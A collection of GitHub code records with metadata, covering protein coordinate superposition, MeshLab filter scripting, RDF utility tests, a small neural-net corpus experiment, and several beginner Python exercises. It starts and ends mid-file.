раз?(Y/N)\")\n\twhile m!=0:\n\t\tif ch.lower()==\"y\":\n\t\t\tm-=1\n\t\telif ch.lower()==\"n\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Y или N... других ответов НЕТ!\") \n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"bagum4eg/Gallows","sub_path":"gallows.py","file_name":"gallows.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22872813078","text":"import numba as nb\nimport numpy as np\n\n\n@nb.njit\n# @numba_cc.export('normalize', 'f64[:](f64[:])')\ndef normalize(numbers):\n minv, maxv = np.min(numbers), np.max(numbers)\n return (numbers - minv) / (maxv - minv)\n\n\n@nb.njit\n# @numba_cc.export('nb_mean_axis_0', 'f64[:](f64[:])')\ndef nb_mean_axis_0(array: np.ndarray) -> np.ndarray:\n \"\"\"\n Same as np.mean(array, axis=0) but njitted\n \"\"\"\n mean_array = np.zeros(array.shape[1])\n for i in range(array.shape[1]):\n mean_array[i] = np.mean(array[:, i])\n return mean_array\n\n\n@nb.njit\n# @numba_cc.export('svd_superimpose', '(f64[:], f64[:])')\ndef svd_superimpose(coords_1: np.ndarray, coords_2: np.ndarray):\n \"\"\"\n Superimpose paired coordinates on each other using svd\n\n Parameters\n ----------\n coords_1\n numpy array of coordinate data for the first protein; shape = (n, 3)\n coords_2\n numpy array of corresponding coordinate data for the second protein; shape = (n, 3)\n\n Returns\n -------\n rotation matrix, translation matrix for optimal superposition\n \"\"\"\n centroid_1, centroid_2 = nb_mean_axis_0(coords_1), nb_mean_axis_0(coords_2)\n coords_1_c, coords_2_c = coords_1 - centroid_1, coords_2 - centroid_2\n correlation_matrix = np.dot(coords_2_c.T, coords_1_c)\n u, s, v = np.linalg.svd(correlation_matrix)\n reflect = np.linalg.det(u) * np.linalg.det(v) < 0\n if reflect:\n s[-1] = -s[-1]\n u[:, -1] = -u[:, -1]\n rotation_matrix = np.dot(u, v)\n translation_matrix = centroid_1 - np.dot(centroid_2, rotation_matrix)\n return rotation_matrix.astype(np.float64), translation_matrix.astype(np.float64)\n\n\n@nb.njit\n# @numba_cc.export('apply_rotran', '(f64[:], f64[:], f64[:])')\ndef apply_rotran(coords: np.ndarray, rotation_matrix: np.ndarray, translation_matrix: np.ndarray) -> np.ndarray:\n \"\"\"\n Applies a rotation and translation matrix onto coordinates\n\n Parameters\n ----------\n coords\n rotation_matrix\n translation_matrix\n\n Returns\n -------\n transformed coordinates\n \"\"\"\n return np.dot(coords, rotation_matrix) + translation_matrix\n\n\n# @numba_cc.export('superpose_with_pos', '(f64[:], f64[:], f64[:], f64[:])')\n@nb.njit\ndef superpose_with_pos(coords_1, coords_2, common_coords_1, common_coords_2):\n \"\"\"\n Superpose two sets of un-aligned coordinates using smaller subsets of aligned coordinates\n\n Parameters\n ----------\n coords_1\n coords_2\n common_coords_1\n common_coords_2\n\n Returns\n -------\n superposed coord_1, superposed coords_2, superposed common_coords_2\n \"\"\"\n rot, tran = svd_superimpose(common_coords_1, common_coords_2)\n coords_1 = coords_1 - nb_mean_axis_0(common_coords_1)\n coords_2 = np.dot(coords_2 - nb_mean_axis_0(common_coords_2), rot)\n common_coords_2_rot = apply_rotran(common_coords_2, rot, tran)\n return coords_1, coords_2, common_coords_2_rot\n\n\n@nb.njit\n# @numba_cc.export('make_distance_matrix', '(f64[:], f64[:], f64, b1)')\ndef make_distance_matrix(coords_1: np.ndarray, coords_2: np.ndarray, gamma, normalized=False) -> np.ndarray:\n \"\"\"\n Makes matrix of euclidean distances of each coordinate in coords_1 to each coordinate in coords_2\n TODO: probably faster to do upper triangle += transpose\n Parameters\n ----------\n coords_1\n shape = (n, 3)\n coords_2\n shape = (m, 3)\n gamma\n normalized\n Returns\n -------\n matrix; shape = (n, m)\n \"\"\"\n distance_matrix = np.zeros((coords_1.shape[0], coords_2.shape[0]))\n for i in range(coords_1.shape[0]):\n for j in range(coords_2.shape[0]):\n distance_matrix[i, j] = np.exp(-gamma * np.sum((coords_1[i] - coords_2[j]) ** 2, axis=-1))\n if normalized:\n return normalize(distance_matrix)\n else:\n return distance_matrix\n\n\n@nb.njit\n# @numba_cc.export('get_rmsd', '(f64[:], f64[:])')\ndef get_rmsd(coords_1: np.ndarray, coords_2: np.ndarray) -> float:\n \"\"\"\n RMSD of paired coordinates = normalized square-root of sum of squares of euclidean distances\n \"\"\"\n return np.sqrt(np.sum((coords_1 - coords_2) ** 2) / coords_1.shape[0])\n\n\n@nb.njit\n# @numba_cc.export('get_caretta_score', '(f64[:], f64[:], f64, b1)')\ndef get_caretta_score(coords_1: np.ndarray, coords_2: np.ndarray, gamma, normalized) -> float:\n \"\"\"\n Get caretta score for a a set of paired coordinates\n\n Parameters\n ----------\n coords_1\n coords_2\n gamma\n normalized\n\n Returns\n -------\n Caretta score\n \"\"\"\n score = 0\n for i in range(coords_1.shape[0]):\n score += np.exp(\n -gamma * np.sum((coords_1[i] - coords_2[i]) ** 2, axis=-1))\n if normalized:\n return score / coords_1.shape[0]\n else:\n return score\n\n\n\n","repo_name":"n-canter/gamaps","sub_path":"gaCaretta/caretta/rmsd_calculations.py","file_name":"rmsd_calculations.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25140340575","text":"class Data:\n def __init__(self, data):\n self.data = data\n\n @classmethod\n def format_data(cls, data):\n if data.replace('-', '').isdigit():\n return int(data.replace('-', ''))\n else:\n return 'Нужно вводить число в формате дд-мм-гггг!!! Ничего другого вводить нельзя'\n\n @staticmethod\n def validation(data):\n\n a = data.replace('-', '')\n if a.isdigit():\n if (int(a[:2]) > 31) or (int(a[:2]) < 1):\n print(\"Дни бывают от 1 до 31\")\n if (int(a[2:4]) > 12) or (int(a[2:4]) < 1):\n print(\"Месяцы бывают от 1 до 12\")\n if int(a[4:]) < 1000:\n print(\"Мы работаем с датами настоящего и прошлого тысячелетия!!!\")\n if (int(a[2:4]) < 13) and (int(a[2:4]) > 0) and (int(a[:2]) < 32) and (int(a[:2]) > 0):\n print('Валидация пройдена!!')\n\n else:\n print('Нужно вводить число в формате дд-мм-гггг!!! Ничего другого вводить нельзя')\n\n\ndate = input('Введите дату в формате дд-мм-гггг: ')\n\nprint(\"Используем @classmethod\")\nprint(Data.format_data(date))\nprint(type(Data.format_data(date)))\nprint()\nprint(\"Используем @staticmethod\")\nData.validation(date)\n","repo_name":"Sashagrande/Faculty-of-AI","sub_path":"Lesson_8/task-1.py","file_name":"task-1.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16859425681","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\nN, M = map(int, input().split())\r\n\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nK = int(input())\r\n\r\nlocations = [list(map(lambda x: int(x)-1, input().split())) for _ in range(K)]\r\n\r\nfor loc in locations:\r\n sum_arr = 0\r\n for i in range(loc[0], loc[2] + 1): # x\r\n for j in range(loc[1], loc[3] + 1): # y\r\n sum_arr += arr[i][j]\r\n print(sum_arr)","repo_name":"MHK183/Practice_Algorithms","sub_path":"백준/Silver/2167. 2차원 배열의 합/2차원 배열의 합.py","file_name":"2차원 배열의 합.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10041203733","text":"\"\"\" MeshLabXML functions to transfer attributes \"\"\"\n\nfrom . import util\n\n\ndef tex2vc(script):\n \"\"\"Transfer texture colors to vertex colors\n\n BUG: this does not work correctly if the file has multiple textures; it\n only uses one texture and remaps all of the UVs to that\n https://github.com/cnr-isti-vclab/meshlab/issues/124\n should be fixed in post 2016.12 release\n\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vc2tex(script, tex_name='TEMP3D_texture.png', tex_width=1024,\n tex_height=1024, overwrite_tex=False, assign_tex=False,\n fill_tex=True):\n \"\"\"Transfer vertex colors to texture colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n tex_name (str): The texture file to be created\n tex_width (int): The texture width\n tex_height (int): The texture height\n overwrite_tex (bool): If current mesh has a texture will be overwritten (with provided texture dimension)\n assign_tex (bool): Assign the newly created texture\n fill_tex (bool): If enabled the unmapped texture space is colored using a pull push filling algorithm, if false is set to black\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Vertex Color to Texture'\n else:\n filter_name = 'Transfer: Vertex Color to Texture'\n filter_xml = ''.join([\n ' \\n' % filter_name,\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef fc2vc(script):\n \"\"\"Transfer face colors to vertex colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vc2fc(script):\n \"\"\"Transfer vertex colors to face colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n \"\"\"\n filter_xml = ' \\n'\n util.write_filter(script, filter_xml)\n return None\n\n\ndef mesh2fc(script, all_visible_layers=False):\n \"\"\"Transfer mesh colors to face colors\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n all_visible_layers (bool): If true the color mapping is applied to all the meshes\n \"\"\"\n filter_xml = ''.join([\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vert_attr_2_meshes(script, source_mesh=0, target_mesh=1,\n geometry=False, normal=False, color=True,\n quality=False, selection=False,\n quality_distance=False, max_distance=0.5):\n \"\"\"Vertex Attribute Transfer (between 2 meshes)\n\n Transfer the chosen per-vertex attributes from one mesh to another. Useful to transfer attributes to different representations of the same object. For each vertex of the target mesh the closest point (not vertex!) on the source mesh is computed, and the requested interpolated attributes from that source point are copied into the target vertex.\n\n The algorithm assumes that the two meshes are reasonably similar and aligned.\n\n UpperBound: absolute value (not percentage)\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh that contains the source data that we want to transfer\n target_mesh (int): The mesh whose vertexes will receive the data from the source\n geometry (bool): If enabled, the position of each vertex of the target mesh will be snapped onto the corresponding closest point on the source mesh\n normal (bool): If enabled, the normal of each vertex of the target mesh will get the (interpolated) normal of the corresponding closest point on the source mesh\n color (bool): If enabled, the color of each vertex of the target mesh will become the color of the corresponding closest point on the source mesh\n quality (bool): If enabled, the quality of each vertex of the target mesh will become the quality of the corresponding closest point on the source mesh\n selection (bool): If enabled, each vertex of the target mesh will be selected if the corresponding closest point on the source mesh falls in a selected face\n quality_distance (bool): If enabled, we store the distance of the transferred value as in the vertex quality\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering attributes\n\n \"\"\"\n filter_xml = ''.join([\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef vert_attr2tex_2_meshes(script, source_mesh=0, target_mesh=1, attribute=0,\n max_distance=0.5, tex_name='TEMP3D_texture.png',\n tex_width=1024, tex_height=1024,\n overwrite_tex=True, assign_tex=False,\n fill_tex=True):\n \"\"\"Transfer Vertex Attributes to Texture (between 2 meshes)\n\n Target mesh must be saved to disk or filter will fail\n\n Created texture seems to be created with absolute pathname. To set relative pathname,\n use mlx.texture.set_texture afterwards\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh that contains the source data that we want to transfer\n target_mesh (int): The mesh whose texture will be filled according to source mesh data\n attribute (int): Choose what attribute has to be transferred onto the target texture. You can choose between Per vertex attributes (color, normal, quality) or to transfer color information from source mesh texture\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering data\n tex_name (str): The texture file to be created\n tex_width (int): The texture width\n tex_height (int): The texture height\n overwrite_tex (bool): If target mesh has a texture will be overwritten (with provided texture dimension)\n assign_tex (bool): Assign the newly created texture to target mesh\n fill_tex (bool): If enabled the unmapped texture space is colored using a pull push filling algorithm, if false is set to black\n\n Layer stack:\n No impacts\n\n MeshLab versions:\n 2016.12\n 1.3.4BETA\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Transfer Vertex Attributes to Texture (between 2 meshes)'\n else:\n filter_name = 'Transfer: Vertex Attributes to Texture (1 or 2 meshes)'\n filter_xml = ''.join([\n ' \\n'.format(filter_name),\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n\n\ndef tex2vc_2_meshes(script, source_mesh=0, target_mesh=1, max_distance=0.5):\n \"\"\"Transfer texture colors to vertex colors (between 2 meshes)\n\n Args:\n script: the FilterScript object or script filename to write\n the filter to.\n source_mesh (int): The mesh with associated texture that we want to sample from\n target_mesh (int): The mesh whose vertex color will be filled according to source mesh texture\n max_distance (float): Sample points for which we do not find anything within this distance are rejected and not considered for recovering color\n\n Layer stack:\n No impacts\n\n MeshLab versions:\n 2016.12\n 1.3.4BETA\n \"\"\"\n if script.ml_version == '1.3.4BETA':\n filter_name = 'Texture to Vertex Color (between 2 meshes)'\n else:\n filter_name = 'Transfer: Texture to Vertex Color (1 or 2 meshes)'\n filter_xml = ''.join([\n ' \\n'.format(filter_name),\n ' \\n',\n ' \\n',\n ' \\n',\n ' \\n'])\n util.write_filter(script, filter_xml)\n return None\n","repo_name":"3DLIRIOUS/MeshLabXML","sub_path":"meshlabxml/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":13554,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"53"} +{"seq_id":"3831451670","text":"import numpy as np\nimport corpora\nimport utils\nfrom sklearn import metrics\nfrom network import Network\nfrom joblib import Parallel, delayed\nimport joblib\n\n\ndef extract_boundaries(corpus):\n \"\"\"Returns a corpus with boundaries removed, and boundary markers.\n\n XABXDEFXHXIJKLX -> ABDEFHIJKL, 0100110001\"\"\"\n pairs = utils.neighbors(corpus)\n phones_and_boundaries = ((phone, nxt in 'XQ') # phone, precedes_boundary\n for phone, nxt in pairs # for all adjacent pairs\n if phone != 'X') # except ones that lead with a boundary\n return phones_and_boundaries\n\ndef prepare(corpus, distributed):\n # Nets are trained to predict the next phoneme.\n inputs, targets = zip(*utils.neighbors(corpus))\n\n # Encode phonemes into numeric representations.\n encoding = corpora.get_encoding(distributed=distributed)\n\n return [encoding[c] for c in inputs], [encoding[c] for c in targets]\n\n\ndef get_corpora(lang, num_train=500000, num_test=10000, distributed=False):\n full_corpus = corpora.get_corpus(lang, word_boundaries=True)\n\n # A list of (phoneme, precedes_boundary) tuples.\n phones_and_boundaries = extract_boundaries(full_corpus)\n\n # Divide into train and test.\n train, test = corpora.train_test_split(phones_and_boundaries, \n num_train, num_test, mode='end')\n\n # Separate phones from boundary markers.\n train_phones, _ = map(list, zip(*train))\n test_phones, test_bounds = map(list, zip(*test))\n joblib.dump(test_bounds, lang + '_bounds.pkl')\n return\n\n # Construct targets and encode phonemes.\n train_in, train_out = prepare(train_phones, distributed)\n test_in, test_out = prepare(test_phones, distributed)\n \n # Remove the trailing bound to match test_out.\n del test_bounds[-1]\n assert len(train_in) == len(train_out)\n assert len(test_in) == len(test_out) == len(test_bounds)\n\n return (train_in, train_out), (test_in, test_out), test_bounds\n\n\ndef run_experiment(net, lang, exp):\n with open('experiment/{0}/train{1}.txt'.format(lang, exp), 'r') as f:\n exp_train = f.read()\n train = prepare(exp_train, net.distributed)\n net.fit(*train)\n\n with open('experiment/{0}/test{1}.txt'.format(lang, exp), 'r') as f:\n trials = ['Q' + word.strip() + 'Q' for word in f]\n\n for word in trials:\n trial_in, trial_out = prepare(word, net.distributed)\n result = net.test(trial_in, trial_out)\n yield result\n\n\ndef run_net(net, lang, num_train, num_test, name=None):\n name = name or lang + str(net.seed) + ('d' if net.distributed else 'l')\n save_dir = 'nets/' + name\n train, test, test_bounds = get_corpora(lang, num_train, num_test, net.distributed)\n net.fit(*train)\n print('saved', name)\n net.save(save_dir)\n test_result = net.test(*test)\n test_errors = test_result['error_total']\n test_outputs = test_result['out_activations']\n\n exp_a_results = run_experiment(net, lang, 'A')\n exp_a_errors = [result['error_total'] for result in exp_a_results]\n net = Network.load(save_dir) # reset to before experiment A training\n exp_b_results = run_experiment(net, lang, 'B')\n exp_b_errors = [result['error_total'] for result in exp_b_results]\n\n return {'lang': lang,\n 'name': name,\n 'distributed': net.distributed,\n 'test_errors': test_errors,\n 'test_outputs': test_outputs,\n 'exp_a_errors': exp_a_errors,\n 'exp_b_errors': exp_b_errors,\n 'test_bounds': test_bounds}\n\n\ndef main(num_nets=1, num_train=50000, num_test=1000):\n results = []\n for lang in ['english', 'danish']:\n nets = [Network(i, distributed=d) for i in range(num_nets) for d in (False, )]\n jobs = (delayed(run_net)(net, lang, num_train, num_test) for net in nets)\n results.extend(Parallel(n_jobs=-1)(jobs))\n \n joblib.dump(results, 'results.pkl', compress=3)\n\n\n\n\n \n\n\nif __name__ == '__main__':\n #main()\n get_corpora('english', 600000, 10000)","repo_name":"fredcallaway/danish","sub_path":"SRN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7517539885","text":"from tkinter import *\nfrom subguis import *\n\nroot = Tk()\n\nbackBgColor = '#701905'\n\nbgColor = '#701905'\nfgColor = 'white'\nfontSpec = 'Arial 10 bold'\nactiveBg = '#e0e0e0'\n\ntopLabel = 'Programa de criptografia em RSA'\n\ncanvas = Canvas(root, width=270, height=250)\ncanvas.pack()\n\nframe = Frame(root)\nframe.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.8)\n\nframeTop = Frame(frame)\nframeTop.place(rely=0.0, relwidth=1.0)\n\ntitle = Label(frameTop, text=topLabel, bg=backBgColor, pady=5, fg=fgColor, font='Times-new-roman 10 bold')\ntitle.pack(fill=X)\n\nframeBot = Frame(frame)\nframeBot.place(rely=0.35, relwidth=1.0)\n\nbutton1 = Button(frameBot, text='Gerar chave pública', \n bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n command=genkey)\nbutton1.pack(fill=X)\nbutton2 = Button(frameBot, text='Criptografar mensagem', \n bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n command=cryptmens)\nbutton2.pack(fill=X)\nbutton3 = Button(frameBot, text='Descriptografar mensagem', \n bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n command=decptmens)\nbutton3.pack(fill=X)\n\nroot.resizable(width=False, height=False)\nroot.mainloop()","repo_name":"ghastcmd/RSAPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8171223394","text":"import rdflib\nimport unittest\nfrom bibcat import clean_uris, create_rdf_list, delete_bnode, delete_iri\nfrom bibcat import modified_bf_desc, slugify, wikify, replace_iri \n\n__author__ = \"Jeremy Nelson\"\n\nBF = rdflib.Namespace(\"http://id.loc.gov/ontologies/bibframe/\")\nSCHEMA = rdflib.Namespace(\"http://schema.org/\")\n\nclass Test_clean_uris(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n\n def test_good_uri(self):\n entity_1 = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((entity_1, rdflib.RDF.type, rdflib.RDFS.Resource))\n clean_uris(self.graph)\n extracted_entity = self.graph.value(predicate=rdflib.RDF.type,\n object=rdflib.RDFS.Resource)\n self.assertEqual(entity_1, extracted_entity)\n\n\nclass Test_create_rdf_list(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.entity = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.literal_list = [rdflib.Literal(\"One\", lang=\"en\"), \n rdflib.Literal(\"Dos\", lang=\"es\"), \n rdflib.Literal(\"San\", lang=\"jp\")]\n\n\n def test_rdf_list_size_one(self):\n self.graph.add((self.entity, \n rdflib.RDF.type, \n create_rdf_list(self.graph, [rdflib.RDFS.Resource,])))\n self.assertEqual(len(self.graph), 3)\n\n def test_rdf_list_size_three(self):\n self.graph.add((self.entity, \n SCHEMA.numbers,\n create_rdf_list(self.graph, self.literal_list)))\n count_sparql = \"\"\"PREFIX rdf: \n SELECT (COUNT(?a) AS ?count) \n WHERE {?a rdf:first+ ?c}\"\"\"\n result = self.graph.query(count_sparql)\n self.assertEqual(int(result.bindings[0].get('count')),\n 3)\n\n def test_rdf_list_size_three_order_2(self):\n self.graph.add((self.entity,\n SCHEMA.numbers,\n create_rdf_list(self.graph, self.literal_list)))\n second_node_sparql = \"\"\"PREFIX rdf: \n PREFIX schema: \n SELECT ?item\n WHERE {\n schema:numbers/rdf:rest/rdf:rest/rdf:first ?item\n }\"\"\"\n result = self.graph.query(second_node_sparql)\n self.assertEqual(result.bindings[0].get('item'), \n self.literal_list[2])\n\n\nclass Test_delete_bnode(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.entity = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.simple_title_bnode = rdflib.BNode()\n self.graph.add((self.entity,\n rdflib.RDF.type,\n BF.Title))\n self.graph.add((self.entity, BF.title, self.simple_title_bnode))\n self.graph.add((self.simple_title_bnode, \n BF.mainTitle, \n rdflib.Literal(\"This is a test\")))\n self.top_title_bnode = rdflib.BNode()\n self.graph.add((self.entity, BF.title, self.top_title_bnode))\n secondary_title_bnode = rdflib.BNode()\n self.graph.add((self.top_title_bnode, rdflib.RDF.type, BF.Topic))\n self.graph.add((self.top_title_bnode, \n rdflib.RDFS.label, \n rdflib.Literal(\"This is a title and a name\")))\n self.graph.add((self.top_title_bnode, SCHEMA.name, secondary_title_bnode))\n self.graph.add((secondary_title_bnode, \n rdflib.RDF.value,\n rdflib.Literal(\"This is a name\")))\n\n def test_delete_1_level_deep_bnode(self):\n start_size = len(self.graph)\n delete_bnode(self.graph, self.simple_title_bnode)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 2)\n self.assertIsNone(self.graph.value(subject=self.simple_title_bnode,\n predicate=BF.mainTitle))\n\n def test_delete_2_level_deep_bnode(self):\n start_size = len(self.graph)\n delete_bnode(self.graph, self.top_title_bnode)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 5)\n self.assertIsNone(self.graph.value(subject=self.top_title_bnode,\n predicate=rdflib.RDFS.label))\n\nclass Test_delete_iri(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.entity_one = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((self.entity_one, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_one, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n self.entity_two = rdflib.URIRef(\"https://bibcat.org/test-entity-two\")\n self.graph.add((self.entity_two, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_two, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity Two\", lang=\"en\")))\n title_bnode = rdflib.BNode()\n self.graph.add((self.entity_two, BF.title, title_bnode))\n self.graph.add((title_bnode, rdflib.RDF.type, BF.Title))\n self.graph.add((title_bnode, BF.subTitle, rdflib.Literal(\"Subtitle \")))\n\n\n def test_delete_iri(self):\n start_size = len(self.graph)\n delete_iri(self.graph, self.entity_one)\n finish_size = len(self.graph)\n self.assertEqual(start_size - finish_size, 2)\n self.assertIsNone(self.graph.value(subject=self.entity_one,\n predicate=rdflib.RDF.type))\n\n def test_delete_complex_iri(self):\n start_size = len(self.graph)\n delete_iri(self.graph, self.entity_two)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 5)\n self.assertIsNone(self.graph.value(subject=self.entity_two,\n predicate=rdflib.RDF.type))\n \nclass Test_modified_bf_desc(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.graph.namespace_manager.bind(\"bf\", BF)\n self.entity_iri = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((self.entity_iri, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_iri, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n self.message = \"Changed rdfs:label\"\n \n\n def test_default(self):\n modified_bf_desc(graph=self.graph,\n entity_iri=self.entity_iri,\n msg=self.message)\n admin_meta_bnode = self.graph.value(\n subject=self.entity_iri,\n predicate=BF.adminMetadata)\n self.assertIsNotNone(admin_meta_bnode)\n msg_value = self.graph.value(\n subject=admin_meta_bnode,\n predicate=rdflib.RDF.value)\n self.assertEqual(str(msg_value), self.message)\n \n def test_missing_all_keywords(self):\n self.assertRaises(AttributeError,\n modified_bf_desc)\n\n def test_missing_graph_keyword(self):\n self.assertRaises(AttributeError,\n modified_bf_desc,\n entity_iri=self.entity_iri,\n msg=self.message) \n\n def test_missing_entity_iri_keyword(self):\n self.assertRaises(AssertionError,\n modified_bf_desc,\n graph=self.graph,\n msg=self.message)\n\n def test_missing_msg_keyword(self):\n self.assertRaises(AttributeError,\n modified_bf_desc,\n graph=self.graph,\n entity_iri=self.entity_iri)\n\n def test_agent_iri(self):\n agent_iri = rdflib.URIRef(\"https://bibcat.org/Agent-1\")\n self.graph.add((agent_iri, rdflib.RDF.type, BF.Agent))\n modified_bf_desc(graph=self.graph,\n entity_iri=self.entity_iri,\n msg=self.message,\n agent_iri=agent_iri)\n admin_bnode = self.graph.value(subject=self.entity_iri,\n predicate=BF.adminMetadata)\n self.assertIsNotNone(admin_bnode)\n desc_modifier = self.graph.value(subject=admin_bnode,\n predicate=BF.descriptionModifier)\n self.assertEqual(agent_iri, desc_modifier)\n\n def test_person_iri(self):\n person_iri = rdflib.URIRef(\"https://bibcat.org/Person-1\")\n self.graph.add((person_iri, rdflib.RDF.type, BF.Person))\n modified_bf_desc(graph=self.graph,\n entity_iri=self.entity_iri,\n msg=self.message,\n agent_iri=person_iri)\n admin_bnode = self.graph.value(subject=self.entity_iri,\n predicate=BF.adminMetadata)\n self.assertIsNotNone(admin_bnode)\n desc_modifier = self.graph.value(subject=admin_bnode,\n predicate=BF.descriptionModifier)\n self.assertEqual(person_iri, desc_modifier)\n\n \n\n def test_org_iri(self):\n org_iri = rdflib.URIRef(\"https://bibcat.org/Organization-1\")\n self.graph.add((org_iri, rdflib.RDF.type, BF.Person))\n modified_bf_desc(graph=self.graph,\n entity_iri=self.entity_iri,\n msg=self.message,\n agent_iri=org_iri)\n admin_bnode = self.graph.value(subject=self.entity_iri,\n predicate=BF.adminMetadata)\n self.assertIsNotNone(admin_bnode)\n desc_modifier = self.graph.value(subject=admin_bnode,\n predicate=BF.descriptionModifier)\n self.assertEqual(org_iri, desc_modifier)\n\n \n \n\n def tearDown(self):\n pass \n\nclass Test_replace_iri(unittest.TestCase):\n \n def setUp(self):\n self.graph = rdflib.Graph()\n self.entity_one = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((self.entity_one, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_one, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n\n def test_simple_replace(self):\n new_iri = rdflib.URIRef(\"https://bibcat.org/replace-entity\")\n replace_iri(self.graph, self.entity_one, new_iri)\n self.assertEqual(self.graph.value(subject=new_iri, \n predicate=rdflib.RDF.type),\n rdflib.RDFS.Resource)\n self.assertEqual(self.graph.value(subject=new_iri,\n predicate=rdflib.RDFS.label),\n rdflib.Literal(\"Test Entity One\", lang=\"en\"))\n self.assertIsNone(self.graph.value(subject=self.entity_one,\n predicate=rdflib.RDF.type))\n\n def test_bnode_old_iri_exception(self):\n pass\n\n\nclass Test_slugify(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_simple_name(self):\n self.assertEqual(\"mexico-city\",\n slugify(\"Mexico City\"))\n\n\nclass Test_wikify(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_simple_name(self):\n self.assertEqual(\"Tokyo_Japan\",\n wikify(\"Tokyo, Japan\"))\n\n def tearDown(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KnowledgeLinks/bibcat","sub_path":"bibcat/tests/test_bibcat_funcs.py","file_name":"test_bibcat_funcs.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"6353084676","text":"def process_recipe(lines, index):\n name = lines[index]\n count = int(lines[index + 1])\n ingredients = []\n for i in range(index + 2, index + count + 2):\n _name, _quantity, _measure = lines[i].split(' | ')\n ingredients.append({\n 'ingredient_name': _name,\n 'quantity': int(_quantity),\n 'measure': _measure,\n })\n return {name: ingredients}, index + count + 2\n\ndef read_receipts(file_path):\n with open(file_path, 'r') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n lines[i] = line.rstrip('\\n')\n receipts = {}\n index = 0\n while index <= len(lines):\n receipt, index = process_recipe(lines, index)\n index += 1\n receipts.update(receipt)\n return receipts\n\nfile_path = 